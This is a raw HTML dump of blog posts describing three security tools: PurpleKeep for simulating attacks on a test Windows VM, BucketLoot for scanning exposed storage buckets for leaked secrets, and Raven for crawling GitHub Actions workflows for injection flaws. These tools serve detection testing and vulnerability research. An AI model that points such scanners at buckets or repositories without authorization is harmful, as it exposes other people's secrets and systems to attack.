id="BLOGGER_PHOTO_ID_7310071996835853026" src="https://blogger.googleusercontent.com/img/a/AVvXsEitdMCwRvq7xoPJRC_HhfwWpDsB2p1f-r3npUI_cXMKnU1OZrvYhic80imcZQXwUT9FIR_w-jAtWf8YKHfcvhN7d3XWHvgiC8lTdLmdmqC1g23kwsf5fgAwTKMg3l3-NQNVLfAsYX1kEby3U1mPEpnzUbIs4hJvRKSbDeh2JGMXCYkZI4vPPBXVLQUEfDBo=w640-h258" width="640" /></a></p> <h2 dir="auto" tabindex="-1">Infrastructure</h2> <p dir="auto">Deploying the infrastructure uses the Azure Pipeline to perform the following steps:</p> <ul dir="auto"> <li>Deploy Azure services: <ul dir="auto"> <li>Key Vault</li> <li>Log Analytics Workspace</li> <li>Data Connection Endpoint</li> <li>Data Connection Rule</li> </ul> </li> <li>Generate SSH keypair and password for the Windows account and store in the Key Vault</li> <li>Create a Windows 11 VM</li> <li>Install OpenSSH</li> <li>Configure and deploy the SSH public key</li> <li>Install Invoke-AtomicRedTeam</li> <li>Install Microsoft Defender for Endpoint and configure exceptions</li> <li>(Optional) Apply security and/or audit policy files</li> <li>Reboot</li> </ul> <h2 dir="auto" tabindex="-1">Simulation</h2> <p dir="auto">Currently only the Atomics from the public repository are supported. The pipelines takes a Technique ID as input or a comma seperate list of techniques, for example:</p> <ul dir="auto"> <li>T1059.003</li> <li>T1027,T1049,T1003</li> </ul> <p dir="auto">The logs of the simulation are ingested into the AtomicLogs_CL table of the Log Analytics Workspace.</p> <p dir="auto">There are currently two ways to run the simulation:</p> <h3 dir="auto" tabindex="-1"><a href="https://github.com/Retrospected/PurpleKeep/blob/main/rotate_simulation.yml" rel="nofollow" target="_blank" title="Rotating simulation">Rotating simulation</a></h3> <p dir="auto">This pipeline will deploy a fresh platform after the simulation of each TTP. The Log Analytic workspace will maintain the logs of each run.</p> <p dir="auto"><strong>Warning: this will onboard a large number of hosts into your EDR</strong></p> <h3 dir="auto" tabindex="-1"><a href="https://github.com/Retrospected/PurpleKeep/blob/main/single_deploy_simulation.yml" rel="nofollow" target="_blank" title="Single deploy simulation">Single deploy simulation</a></h3> <p dir="auto">A fresh infrastructure will be deployed only at the beginning of the pipeline. All TTP's will be simulated on this instance. This is the fastests way to simulate and prevents onboarding a large number of devices, however running a lot of simulations in a same environment has the risk of contaminating the environment and making the simulations less stable and predictable.</p> <h2 dir="auto" tabindex="-1">TODO</h2> <h3 dir="auto" tabindex="-1">Must have</h3> <ul class="contains-task-list"> <li class="task-list-item">Check if pre-reqs have been fullfilled before executing the atomic</li> <li class="task-list-item">Provide the ability to import own group policy</li> <li class="task-list-item">Cleanup biceps and pipelines by using a master template (Complete build)</li> <li class="task-list-item">Build pipeline that runs technique sequently with reboots in between</li> <li class="task-list-item">Add Azure ServiceConnection to variables instead of parameters</li> </ul> <h3 dir="auto" tabindex="-1">Nice to have</h3> <ul class="contains-task-list"> <li class="task-list-item">MDE Off-boarding (?)</li> <li class="task-list-item">Automatically join and leave AD domain</li> <li class="task-list-item">Make Atomics repository configureable</li> <li class="task-list-item">Deploy VECTR as part of the infrastructure and ingest results during simulation. Also see the <a data-hovercard-type="issue" data-hovercard-url="/SecurityRiskAdvisors/VECTR/issues/235/hovercard" href="https://github.com/SecurityRiskAdvisors/VECTR/issues/235" rel="nofollow" target="_blank" title="VECTR API issue">VECTR API issue</a></li> <li class="task-list-item">Tune alert API call to Microsoft Defender for Endpoint (Microsoft.Security alertsSuppressionRules)</li> <li class="task-list-item">Add C2 infrastructure for manual or C2 based simulations</li> </ul> <h2 dir="auto" tabindex="-1">Issues</h2> <ul class="contains-task-list"> <li class="task-list-item">Atomics do not return if a simulation succeeded or not</li> <li class="task-list-item">Unreliable OpenSSH extension installer failing infrastructure deployment</li> <li class="task-list-item">Spamming onboarded devices in the EDR</li> </ul> <h2 dir="auto" tabindex="-1">References</h2> <ul dir="auto"> <li><a href="https://github.com/splunk/attack_range" rel="nofollow" target="_blank" title="Splunk's Attack Range">Splunk's Attack Range</a></li> <li><a href="https://vimeo.com/819912016/c76af1ca39" rel="nofollow" target="_blank" title="Sp4rkCon 2023 - Continuous End-to-End Detection Validation and Reporting with Carrie Roberts">Sp4rkCon 2023 - Continuous End-to-End Detection Validation and Reporting with Carrie Roberts</a></li> <li><a href="https://redcanary.com/blog/coalmine/" rel="nofollow" target="_blank" title="Red Canary's Coalmine">Red Canary's Coalmine</a></li></ul><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/Retrospected/PurpleKeep" rel="nofollow" target="_blank" title="Download PurpleKeep">Download PurpleKeep</a></span></b></div></div></article>
<div style="clear: both;"></div>
<div class="post-footer"></div>OffensiveSechttp://www.blogger.com/profile/12324833783082823870noreply@blogger.com0tag:blogger.com,1999:blog-2588088702885294836.post-27369691103492021082024-02-18T15:56:00.000-08:002024-02-18T15:56:00.459-08:00BucketLoot - An Automated S3-compatible Bucket Inspector<article><div class="post-body entry-content" id="post-body-1669689476304766213" itemprop="articleBody"><p dir="auto" style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEj8rfEc4U5KOQUZHwmHZ0iCUoXlCufLg5nG0YLO9hGiD4u1g2wCbTdy8fhUkFYEpIWSC4DuPifxlM_4vjj3a8nitJR4VbqeR-w0wqwJ2gonk_hNYJYDXF1C5iQ7O8Csi6CshbfSu95qFVrjdTLD4_sOCW0_H8FO0wJuGsVeEJ0PUHvWeSsvFAV8b6x9UN_3"><img alt="" border="0" height="444" id="BLOGGER_PHOTO_ID_7310071935771016082" src="https://blogger.googleusercontent.com/img/a/AVvXsEj8rfEc4U5KOQUZHwmHZ0iCUoXlCufLg5nG0YLO9hGiD4u1g2wCbTdy8fhUkFYEpIWSC4DuPifxlM_4vjj3a8nitJR4VbqeR-w0wqwJ2gonk_hNYJYDXF1C5iQ7O8Csi6CshbfSu95qFVrjdTLD4_sOCW0_H8FO0wJuGsVeEJ0PUHvWeSsvFAV8b6x9UN_3=w640-h444" width="640" /></a></p> <div><br /> BucketLoot is an automated S3-compatible Bucket inspector that can help users extract assets, flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text. <br /><br /> The tool can scan for buckets deployed on Amazon Web Services (AWS), Google Cloud Storage (GCS), DigitalOcean Spaces and even custom domains/URLs which could be connected to these platforms. It returns the output in a JSON format, thus enabling users to parse it according to their liking or forward it to any other tool for further processing. <br /><br /> BucketLoot comes with a guest mode by default, which means a user doesn't needs to specify any API tokens / Access Keys initially in order to run the scan. The tool will scrape a maximum of 1000 files that are returned in the XML response and if the storage bucket contains more than 1000 entries which the user would like to run the scanner on, they can provide platform credentials to run a complete scan. If you'd like to know more about the tool, make sure to check out our <a href="https://redhuntlabs.com/blog/introducing-bucketloot-an-automated-cloud-bucket-inspector/" rel="nofollow" target="_blank" title="blog">blog</a>.</div><span><a name="more"></a></span><div><br /></div> <div> <h2 dir="auto" tabindex="-1"> Features </h2> <h4 dir="auto" tabindex="-1"> Secret Scanning </h4> Scans for over 80+ unique RegEx signatures that can help in uncovering secret exposures tagged with their severity from the misconfigured storage bucket. Users have the ability to modify or add their own signatures in the <a href="https://github.com/redhuntlabs/BucketLoot/blob/master/regexes.json" rel="nofollow" target="_blank" title="regexes.json">regexes.json</a> file. If you believe you have any cool signatures which might be helpful for others too and could be flagged at scale, go ahead and make a PR! <h4 dir="auto" tabindex="-1"> Sensitive File Checks</h4> Accidental sensitive file leakages are a big problem that affects the security posture of individuals and organisations. BucketLoot comes with a 80+ unique regEx signatures list in <a href="https://github.com/redhuntlabs/BucketLoot/blob/master/vulnFiles.json" rel="nofollow" target="_blank" title="vulnFiles.json">vulnFiles.json</a> which allows users to flag these sensitive files based on file names or extensions. <h4 dir="auto" tabindex="-1"> Dig Mode </h4> Want to quickly check if any target website is using a misconfigured bucket that is leaking secrets or any other sensitive data? Dig Mode allows you to pass non-S3 targets and let the tool scrape URLs from response body for scanning. <h4 dir="auto" tabindex="-1"> Asset Extraction </h4> Interested in stepping up your asset discovery game? BucketLoot extracts all the URLs/Subdomains and Domains that could be present in an exposed storage bucket, enabling you to have a chance of discovering hidden endpoints, thus giving you an edge over the other traditional recon tools. <h4 dir="auto" tabindex="-1"> Searching </h4> The tool goes beyond just asset discovery and secret exposure scanning by letting users search for custom keywords and even Regular Expression queries which may help them find exactly what they are looking for.</div><div><br /></div> <div> <h2 dir="auto" tabindex="-1"> Acknowledgements </h2> <ul dir="auto" type="disc"> <li><a href="https://www.blackhat.com/us-23/arsenal/schedule/#bucketloot---an-automated-s-bucket-inspector-33536" rel="nofollow" target="_blank" title="Black Hat USA 2023 [Arsenal]">Black Hat USA 2023 [Arsenal]</a></li> <li><a href="https://blackhatmea.com/session/bucketloot-automated-s3-bucket-inspector" rel="nofollow" target="_blank" title="Black Hat MEA 2023 [Arsenal]">Black Hat MEA 2023 [Arsenal]</a></li> <li><a href="https://www.blackhat.com/eu-23/arsenal/schedule/index.html#bucketloot---an-automated-s-compatible-bucket-inspector-35800" rel="nofollow" target="_blank" title="Black Hat EU 2023 [Arsenal]">Black Hat EU 2023 [Arsenal]</a></li> </ul> </div> <p dir="auto"><em><a href="https://redhuntlabs.com/nvadr" rel="nofollow" target="_blank" title="BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets, flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text. (20)"><code>To know more about our Attack Surface </code></a><code><a href="https://www.fuck.com/search/label/Management" target="_blank" title="Management">Management</a> platform, check out NVADR.</code></em></p><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/redhuntlabs/BucketLoot" rel="nofollow" target="_blank" title="Download BucketLoot">Download BucketLoot</a></span></b></div></div></article>
<div style="clear: both;"></div>
<div class="post-footer"></div>OffensiveSechttp://www.blogger.com/profile/12324833783082823870noreply@blogger.com0tag:blogger.com,1999:blog-2588088702885294836.post-50897680764154688482024-02-18T15:53:00.000-08:002024-02-18T15:53:32.599-08:00Raven - CI/CD Security Analyzer<article><div class="post-body entry-content" id="post-body-8852427450713348385" itemprop="articleBody"><p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgyRJD1KzNj4g6TZU4paIfRlwntEhlE-1TTejSMgWUFloDHdFdiDkH20xf7Ao3Ukd_hYOhcAiDjnOQPKfNEhxkdCOp50oF6ILXtwOZ3ER6ydyZqo8L40HmFkhwFJFpcwmYcZ9HUppDQdEe1lTXpZ9a3Cizx4vdH8BodDisKTzncOM_tqg0SEv0gTojpIbqE"><img alt="" border="0" height="256" id="BLOGGER_PHOTO_ID_7310072230664940578" src="https://blogger.googleusercontent.com/img/a/AVvXsEgyRJD1KzNj4g6TZU4paIfRlwntEhlE-1TTejSMgWUFloDHdFdiDkH20xf7Ao3Ukd_hYOhcAiDjnOQPKfNEhxkdCOp50oF6ILXtwOZ3ER6ydyZqo8L40HmFkhwFJFpcwmYcZ9HUppDQdEe1lTXpZ9a3Cizx4vdH8BodDisKTzncOM_tqg0SEv0gTojpIbqE=w640-h256" width="640" /></a></p><p style="text-align: center;"><br /></p> <p dir="auto"><strong>RAVEN (Risk Analysis and Vulnerability Enumeration for CI/CD)</strong> is a powerful security tool designed to perform massive scans for GitHub Actions CI workflows and digest the discovered data into a Neo4j database. Developed and maintained by the <a href="https://cycode.com/?utm_source=github_website&utm_medium=referral&utm_campaign=raven_page" rel="nofollow" target="_blank" title="Cycode">Cycode</a> research team.</p> <p dir="auto">With Raven, we were able to identify and report security vulnerabilities in some of the most popular repositories hosted on GitHub, including:</p> <ul dir="auto"> <li><a href="https://github.com/freeCodeCamp/freeCodeCamp" rel="nofollow" target="_blank" title="FreeCodeCamp">FreeCodeCamp</a> (the most popular project on GitHub)</li> <li><a href="https://github.com/storybookjs/storybook" rel="nofollow" target="_blank" title="Storybook">Storybook</a> (One of the most popular frontend frameworks)</li> <li><a href="https://github.com/microsoft/fluentui" rel="nofollow" target="_blank" title="Fluent UI">Fluent UI</a> by Microsoft</li> <li>and much more</li> </ul> <p dir="auto">We listed all vulnerabilities discovered using Raven in the tool <a href="https://github.com/CycodeLabs/raven#hall-of-fame---vulnerabilities-found-and-disclosed-using-raven" rel="nofollow" target="_blank" title="Hall of Fame">Hall of Fame</a>.</p> <h2 dir="auto" tabindex="-1">What is Raven</h2> <p dir="auto">The tool provides the following capabilities to scan and analyze potential CI/CD vulnerabilities:</p> <ul dir="auto"> <li><strong>Downloader:</strong> You can download workflows and actions necessary for analysis. Workflows can be downloaded for a specified organization or for all repositories, sorted by star count. Performing this step is a prerequisite for analyzing the workflows.</li> <li><strong>Indexer:</strong> Digesting the downloaded data into a graph-based Neo4j database. This process involves establishing relationships between workflows, actions, jobs, steps, etc.</li> <li><strong>Query Library:</strong> We created a library of pre-defined queries based on research conducted by the community.</li> <li><strong>Reporter:</strong> Raven has a simple way of reporting suspicious findings. As an example, it can be incorporated into the CI process for pull requests and run there.</li> </ul> <p dir="auto">Possible usages for Raven:</p> <ul dir="auto"> <li>Scanner for your own organization's security</li> <li>Scanning specified organizations for bug bounty purposes</li> <li>Scan everything and report issues found to save the internet</li> <li>Research and learning purposes</li> </ul> <p dir="auto">This tool provides a reliable and scalable solution for CI/CD security analysis, enabling users to query bad configurations and gain valuable insights into their codebase's security posture.</p> <h2 dir="auto" tabindex="-1">Why Raven</h2> <p dir="auto">In the past year, Cycode Labs conducted extensive research on fundamental security issues of CI/CD systems. We examined the depths of many systems, thousands of projects, and several configurations. The conclusion is clear – the model in which security is delegated to developers has failed. This has been proven several times in our previous content:</p> <ul dir="auto"> <li>A simple injection scenario exposed dozens of public repositories, including popular open-source projects.</li> <li>We found that one of the most popular frontend frameworks was vulnerable to the innovative method of branch injection attack.</li> <li>We detailed a completely different attack vector, 3rd party integration risks, the most popular project on GitHub, and thousands more.</li> <li>Finally, the Microsoft 365 UI framework, with more than 300 million users, is vulnerable to an additional new threat – an artifact poisoning attack.</li> <li>Additionally, we found, reported, and disclosed hundreds of other vulnerabilities privately.</li> </ul> <p dir="auto">Each of the vulnerabilities above has unique characteristics, making it nearly impossible for developers to stay up to date with the latest security trends. Unfortunately, each vulnerability shares a commonality – each exploitation can impact millions of victims.</p> <p dir="auto">It was for these reasons that Raven was created, a framework for CI/CD security analysis workflows (and GitHub Actions as the first use case). In our focus, we examined complex scenarios where each issue isn't a threat on its own, but when combined, they pose a severe threat.</p> <h2 dir="auto" tabindex="-1">Setup && Run</h2> <p dir="auto">To get started with Raven, follow these installation instructions:</p> <p dir="auto"><strong>Step 1</strong>: Install the Raven package</p> <div><pre><code>pip3 install raven-cycode</code></pre></div> <p dir="auto"><strong>Step 2</strong>: Setup a local Redis server and Neo4j database</p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="docker run -d --name raven-neo4j -p7474:7474 -p7687:7687 --env NEO4J_AUTH=neo4j/123456789 --volume raven-neo4j:/data neo4j:5.12 docker run -d --name raven-redis -p6379:6379 --volume raven-redis:/data redis:7.2.1" dir="auto"><pre><code>docker run -d --name raven-neo4j -p7474:7474 -p7687:7687 --env NEO4J_AUTH=neo4j/123456789 --volume raven-neo4j:/data neo4j:5.12<br />docker run -d --name raven-redis -p6379:6379 --volume raven-redis:/data redis:7.2.1</code></pre></div> <p dir="auto">Another way to setup the environment is by running our provided docker compose file:</p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="git clone https://github.com/CycodeLabs/raven.git cd raven make setup" dir="auto"><pre><code>git clone https://github.com/CycodeLabs/raven.git<br />cd raven<br />make setup</code></pre></div> <p dir="auto"><strong>Step 3</strong>: Run Raven Downloader</p> <p dir="auto">Org mode:</p> <div><pre><code>raven download org --token $GITHUB_TOKEN --org-name RavenDemo</code></pre></div> <p dir="auto">Crawl mode:</p> <div><pre><code>raven download crawl --token $GITHUB_TOKEN --min-stars 1000</code></pre></div> <p dir="auto"><strong>Step 4</strong>: Run Raven Indexer</p> <div><pre><code>raven index</code></pre></div> <p dir="auto"><strong>Step 5</strong>: Inspect the results through the reporter</p> <div><pre><code>raven report --format raw</code></pre></div> <p dir="auto">At this point, it is possible to inspect the data in the Neo4j database, by connecting <a href="http://localhost:7474/browser/" rel="nofollow" target="_blank" title="http://localhost:7474/browser/">http://localhost:7474/browser/</a>.</p> <h3 dir="auto" tabindex="-1">Prerequisites</h3> <ul dir="auto"> <li>Python 3.9+</li> <li>Docker Compose v2.1.0+</li> <li>Docker Engine v1.13.0+</li> </ul> <h2 dir="auto" tabindex="-1">Infrastructure</h2> <p dir="auto">Raven is using two primary docker containers: Redis and Neo4j. <code>make setup</code> will run a <code>docker compose</code> command to prepare that environment.</p> <p dir="auto" style="text-align: center;"><a href="https://raw.githubusercontent.com/CycodeLabs/raven/main/assets/images/infrastructure.png" rel="nofollow" target="_blank" title="CI/CD Security Analyzer (13)"></a><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgv_E2iPqCpHZH80qzyKIybdhk9fzasZeCDuZoBvVh_WrSE_ay29fW2MW_YB0FlUqy9EbSuscREU2CCla6QH27DM8Bdu8rOx4Fe_vwLw6xsx2FanSmAW0MbLH_jWo2FsN3SqX7oguQJXroWLWl2050DeZr6ZhK5el-hictfnNaqugcJSIJxiPtfmV_ksMWc"><img alt="" border="0" height="378" id="BLOGGER_PHOTO_ID_7310072252736706674" src="https://blogger.googleusercontent.com/img/a/AVvXsEgv_E2iPqCpHZH80qzyKIybdhk9fzasZeCDuZoBvVh_WrSE_ay29fW2MW_YB0FlUqy9EbSuscREU2CCla6QH27DM8Bdu8rOx4Fe_vwLw6xsx2FanSmAW0MbLH_jWo2FsN3SqX7oguQJXroWLWl2050DeZr6ZhK5el-hictfnNaqugcJSIJxiPtfmV_ksMWc=w640-h378" width="640" /></a></p> <h2 dir="auto" tabindex="-1">Usage</h2> <p dir="auto">The tool contains three main functionalities, <code>download</code> and <code>index</code> and <code>report</code>.</p> <h3 dir="auto" tabindex="-1">Download</h3> <h4 dir="auto" tabindex="-1">Download Organization Repositories</h4> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="usage: raven download org [-h] --token TOKEN [--debug] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] --org-name ORG_NAME options: -h, --help show this help message and exit --token TOKEN GITHUB_TOKEN to download data from Github API (Needed for effective rate-limiting) --debug Whether to print debug statements, default: False --redis-host REDIS_HOST Redis host, default: localhost --redis-port REDIS_PORT Redis port, default: 6379 --clean-redis, -cr Whether to clean cache in the redis, default: False --org-name ORG_NAME Organization name to download the workflows" dir="auto"><pre><code>usage: raven download org [-h] --token TOKEN [--debug] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] --org-name ORG_NAME<br /><br />options:<br /> -h, --help show this help message and exit<br /> --token TOKEN GITHUB_TOKEN to download data from Github API (Needed for effective rate-limiting)<br /> --debug Whether to print debug statements, default: False<br /> --redis-host REDIS_HOST<br /> Redis host, default: localhost<br /> --redis-port REDIS_PORT<br /> Redis port, default: 6379<br /> --clean-redis, -cr Whether to clean cache in the redis, default: False<br /> --org-name ORG_NAME Organization name to download the workflows</code></pre></div> <h4 dir="auto" tabindex="-1">Download Public Repositories</h4> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="usage: raven download crawl [-h] --token TOKEN [--debug] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] [--max-stars MAX_STARS] [--min-stars MIN_STARS] options: -h, --help show this help message and exit --token TOKEN GITHUB_TOKEN to download data from Github API (Needed for effective rate-limiting) --debug Whether to print debug statements, default: False --redis-host REDIS_HOST Redis host, default: localhost --redis-port REDIS_PORT Redis port, default: 6379 --clean-redis, -cr Whether to clean cache in the redis, default: False --max-stars MAX_STARS Maximum number of stars for a repository --min-stars MIN_STARS Minimum number of stars for a repository, default: 1000" dir="auto"><pre><code>usage: raven download crawl [-h] --token TOKEN [--debug] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] [--max-stars MAX_STARS] [--min-stars MIN_STARS]<br /><br />options:<br /> -h, --help show this help message and exit<br /> --token TOKEN GITHUB_TOKEN to download data from Github API (Needed for effective rate-limiting)<br /> --debug Whether to print debug statements, default: False<br /> --redis-host REDIS_HOST<br /> Redis host, default: localhost<br /> --redis-port REDIS_PORT<br /> Redis port, default: 6379<br /> --clean-redis, -cr Whether to clean cache in the redis, default: False<br /> --max-stars MAX_STARS<br /> Maximum number of stars for a repository<br /> --min-stars MIN_STARS<br /> Minimum number of stars for a repository, default : 1000</code></pre></div> <h3 dir="auto" tabindex="-1">Index</h3> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="usage: raven index [-h] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] [--neo4j-uri NEO4J_URI] [--neo4j-user NEO4J_USER] [--neo4j-pass NEO4J_PASS] [--clean-neo4j] [--debug] options: -h, --help show this help message and exit --redis-host REDIS_HOST Redis host, default: localhost --redis-port REDIS_PORT Redis port, default: 6379 --clean-redis, -cr Whether to clean cache in the redis, default: False --neo4j-uri NEO4J_URI Neo4j URI endpoint, default: neo4j://localhost:7687 --neo4j-user NEO4J_USER Neo4j username, default: neo4j --neo4j-pass NEO4J_PASS Neo4j password, default: 123456789 --clean-neo4j, -cn Whether to clean cache, and index from scratch, default: False --debug Whether to print debug statements, default: False" dir="auto"><pre><code>usage: raven index [-h] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] [--neo4j-uri NEO4J_URI] [--neo4j-user NEO4J_USER] [--neo4j-pass NEO4J_PASS]<br /> [--clean-neo4j] [--debug]<br /><br />options:<br /> -h, --help show this help message and exit<br /> --redis-host REDIS_HOST<br /> Redis host, default: localhost<br /> --redis-port REDIS_PORT<br /> Redis port, default: 6379<br /> --clean-redis, -cr Whether to clean cache in the redis, default: False<br /> --neo4j-uri NEO4J_URI<br /> Neo4j URI endpoint, default: neo4j://localhost:7687<br /> --neo4j-user NEO4J_USER<br /> Neo4j username, default: neo4j<br /> --neo4j-pass NEO4J_PASS<br /> Neo4j password, default: 123456789<br /> --clean-neo4j, -cn Whether to clean cache, and index f rom scratch, default: False<br /> --debug Whether to print debug statements, default: False</code></pre></div> <h3 dir="auto" tabindex="-1">Report</h3> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="usage: raven report [-h] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] [--neo4j-uri NEO4J_URI] [--neo4j-user NEO4J_USER] [--neo4j-pass NEO4J_PASS] [--clean-neo4j] [--tag {injection,unauthenticated,fixed,priv-esc,supply-chain}] [--severity {info,low,medium,high,critical}] [--queries-path QUERIES_PATH] [--format {raw,json}] {slack} ... positional arguments: {slack} slack Send report to slack channel options: -h, --help show this help message and exit --redis-host REDIS_HOST Redis host, default: localhost --redis-port REDIS_PORT Redis port, default: 6379 --clean-redis, -cr Whether to clean cache in the redis, default: False --neo4j-uri NEO4J_URI Neo4j URI endpoint, default: neo4j://localhost:7687 --neo4j-user NEO4J_USER Neo4j username, default: neo4j --neo4j-pass NEO4J_PASS Neo4j password, default: 123456789 --clean-neo4j, -cn Whether to clean cache, and index from scratch, default: False --tag {injection,unauthenticated,fixed,priv-esc,supply-chain}, -t {injection,unauthenticated,fixed,priv-esc,supply-chain} Filter queries with specific tag --severity {info,low,medium,high,critical}, -s {info,low,medium,high,critical} Filter queries by severity level (default: info) --queries-path QUERIES_PATH, -dp QUERIES_PATH Queries folder (default: library) --format {raw,json}, -f {raw,json} Report format (default: raw)" dir="auto"><pre><code>usage: raven report [-h] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] [--neo4j-uri NEO4J_URI]<br /> [--neo4j-user NEO4J_USER] [--neo4j-pass NEO4J_PASS] [--clean-neo4j]<br /> [--tag {injection,unauthenticated,fixed,priv-esc,supply-chain}]<br /> [--severity {info,low,medium,high,critical}] [--queries-path QUERIES_PATH] [--format {raw,json}]<br /> {slack} ...<br /><br />positional arguments:<br /> {slack}<br /> slack Send report to slack channel<br /><br />options:<br /> -h, --help show this help message and exit<br /> --redis-host REDIS_HOST<br /> Redis host, default: localhost<br /> --redis-port REDIS_PORT<br /> Redis port, default: 6379<br /> --clean-redis, -cr Whether to clean cache in the redis, default: False<br /> --neo4j-uri NEO4J_URI<br /> Neo4j URI endpoint, default: neo4j://localhost:7687<br /> --neo4j-user NEO4J_USER<br /> Neo4j username, default: neo4j<br /> --neo4j-pass NEO4J_PASS<br /> Neo4j password, default: 123456789<br /> --clean-neo4j, -cn Whether to clean cache, and index from scratch, default: False<br /> --tag {injection,unauthenticated,fixed,priv-esc,supply-chain}, -t {injection,unauthenticated,fixed,priv-esc,supply-chain}<br /> Filter queries with specific tag<br /> --severity {info,low,medium,high,critical}, -s {info,low,medium,high,critical}<br /> Filter queries by severity level (default: info)<br /> --queries-path QUERIES_PATH, -dp QUERIES_PATH<br /> Queries folder (default: library)<br /> --format {raw,json}, -f {raw,json}<br /> Report format (default: raw)</code></pre></div> <h2 dir="auto" tabindex="-1">Examples</h2> <p dir="auto">Retrieve all workflows and actions associated with the organization.</p> <div><pre><code>raven download org --token $GITHUB_TOKEN --org-name microsoft --org-name google --debug</code></pre></div> <p dir="auto">Scrape all publicly accessible GitHub repositories.</p> <div><pre><code>raven download crawl --token $GITHUB_TOKEN --min-stars 100 --max-stars 1000 --debug</code></pre></div> <p dir="auto">After finishing the download process or if interrupted using Ctrl+C, proceed to index all workflows and actions into the Neo4j database.</p> <div><pre><code>raven index --debug</code></pre></div> <p dir="auto">Now, we can generate a report using our query library.</p> <div><pre><code>raven report --severity high --tag injection --tag unauthenticated</code></pre></div> <h2 dir="auto" tabindex="-1">Rate Limiting</h2> <p dir="auto">For effective rate limiting, you should supply a Github token. For authenticated users, the next rate limiting applies:</p> <ul dir="auto"> <li>Code search - 30 queries per minute</li> <li>Any other API - 5000 per hour</li> </ul> <h2 dir="auto" tabindex="-1">Research Knowledge Base</h2> <ul dir="auto"> <li><a href="https://github.com/CycodeLabs/raven/blob/main/docs/Issue%20Injections/README.md" rel="nofollow" target="_blank" title="Issue Injections">Issue Injections</a></li> <li><a href="https://github.com/CycodeLabs/raven/blob/main/docs/Pull%20Request%20Injections/README.md" rel="nofollow" target="_blank" title="Pull Request Injections">Pull Request Injections</a></li> <li><a href="https://github.com/CycodeLabs/raven/blob/main/docs/Multi%20Prerequisite%20Exploits/README.md" rel="nofollow" target="_blank" title="Workflow Run Injections">Workflow Run Injections</a></li> <li><a href="https://github.com/CycodeLabs/raven/blob/main/docs/Codesee%20Injections/README.md" rel="nofollow" target="_blank" title="CodeSee Injections">CodeSee Injections</a></li> </ul> <h2 dir="auto" tabindex="-1">Current Limitations</h2> <ul dir="auto"> <li>It is possible to run external action by referencing a folder with a <code>Dockerfile</code> (without <code>action.yml</code>). Currently, this behavior isn't supported.</li> <li>It is possible to run external action by referencing a docker container through the <code>docker://...</code> URL. Currently, this behavior isn't supported.</li> <li>It is possible to run an action by referencing it locally. This creates complex behavior, as it may come from a different repository that was checked out previously. The current behavior is trying to find it in the existing repository.</li> <li>We aren't modeling the entire workflow structure. If additional fields are needed, please submit a pull request according to the <a href="https://github.com/CycodeLabs/raven/blob/main/CONTRIBUTING.md" rel="nofollow" target="_blank" title="contribution">contribution</a> guidelines.</li> </ul> <h2 dir="auto" tabindex="-1">Future Research Work</h2> <ul dir="auto"> <li>Implementation of taint analysis. Example use case - a user can pass a pull request title (which is controllable parameter) to an action parameter that is named <code>data</code>. That action parameter may be used in a run command: <code>- run: echo ${{ inputs.data }}</code>, which creates a path for a code execution.</li> <li>Expand the research for findings of harmful misuse of <code>GITHUB_ENV</code>. This may utilize the previous taint analysis as well.</li> <li>Research whether <code>actions/github-script</code> has an interesting threat landscape. If it is, it can be modeled in the graph.</li></ul><h2 dir="auto" tabindex="-1">Want more of CI/CD Security, AppSec, and ASPM? Check out Cycode</h2> <p dir="auto">If you liked Raven, you would probably love our <a href="https://cycode.com/?utm_source=github_website&utm_medium=referral&utm_campaign=raven_page" rel="nofollow" target="_blank" title="Cycode">Cycode</a> platform that offers even more enhanced capabilities for visibility, prioritization, and remediation of vulnerabilities across the software delivery.</p> <p dir="auto">If you are interested in a robust, research-driven Pipeline Security, Application Security, or ASPM solution, don't hesitate to get in touch with us or request a demo using the form <a href="https://cycode.com/book-a-demo/?utm_source=github_website&utm_medium=referral&utm_campaign=raven_page" rel="nofollow" target="_blank" title="https://cycode.com/book-a-demo/">https://cycode.com/book-a-demo/</a>.</p> <br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/CycodeLabs/raven" rel="nofollow" target="_blank" title="Download Raven">Download Raven</a></span></b></div></div></article>
<div style="clear: both;"></div>
<div class="post-footer">
